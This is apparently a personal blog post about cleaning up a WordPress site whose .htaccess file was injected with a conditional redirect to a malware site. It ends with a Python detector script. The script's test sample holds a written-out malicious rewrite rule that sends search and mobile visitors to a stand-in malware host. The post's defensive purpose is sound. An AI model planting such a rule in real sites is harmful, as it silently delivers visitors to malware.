30,000 WordPress blogs infected with malware, time to update your WordPress and its plug-ins!

I actually had this happen to www.genesiscommunications.biz this week. I found that a conditional redirect was added to the .htaccess file. This conditional redirect was sending traffic to a malware site in Russia. This could have resulted in Google flagging our site as a source of malware. I removed the .htaccess file and it appeared again in a few moments. I then upgraded WordPress to the latest version and upgraded the plug-ins. Then I removed any components I was no longer using to avoid further points of entry to the server. (SugarCRM, Joomla and others were installed on the virtual server and I wasn’t using them actively.) After taking these steps I restored a copy of the site from a backup that was taken after the last changes to the site to ensure no rogue entries were left. So far so good.

Here is an article about a similar issue, where code is injected into the page and the end result is a fake-AV type threat that apparently can install without user action.

http://www.networkworld.com/news/2012/030612-30000-wordpress-blogs-infected-to-256993.html

 

The lesson learned is to make sure you regularly update your WordPress and exercise caution when selecting plug-ins.
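
To check for the kind of conditional redirect described above, the following added example (not code from the incident or from the linked article) scans an .htaccess file for a `RewriteRule` that points to an outside host and is guarded by a `RewriteCond` on the referer or user agent. The sample file, the host names and the assumption that the injected rule takes this form are constructed for illustration.

```python
import re

# RewriteCond lines that make a redirect depend on who is visiting.
COND_RE = re.compile(r'^\s*RewriteCond\s+%\{(HTTP_REFERER|HTTP_USER_AGENT)\}', re.I)
# RewriteRule whose substitution is an absolute URL; group 2 is the host.
RULE_RE = re.compile(r'^\s*RewriteRule\s+\S+\s+(https?://([^/\s:]+)\S*)', re.I)


def find_conditional_redirects(htaccess_text, own_hosts):
    """Return (line_no, tested_variables, target_url) for every RewriteRule
    that redirects to a host outside own_hosts and is guarded by a
    RewriteCond on the referer or user agent."""
    own = {h.lower() for h in own_hosts}
    findings = []
    pending = []  # variables tested by RewriteCond lines awaiting their rule
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith('#'):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.group(1).upper())
            continue
        rule = RULE_RE.match(line)
        if rule and pending and rule.group(2).lower() not in own:
            findings.append((no, ','.join(pending), rule.group(1)))
        if line.strip().lower().startswith('rewriterule'):
            pending = []  # conditions apply only to the next RewriteRule
    return findings


# Constructed sample: the stock WordPress block followed by an injected rule.
SAMPLE = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo).*$ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (android|iphone) [NC]
RewriteRule ^(.*)$ http://malware-host.example.invalid/in.php [R=301,L]
"""

if __name__ == '__main__':
    for no, variables, url in find_conditional_redirects(SAMPLE, {'www.example.org'}):
        print(f'line {no}: redirect to {url} conditional on {variables}')
```
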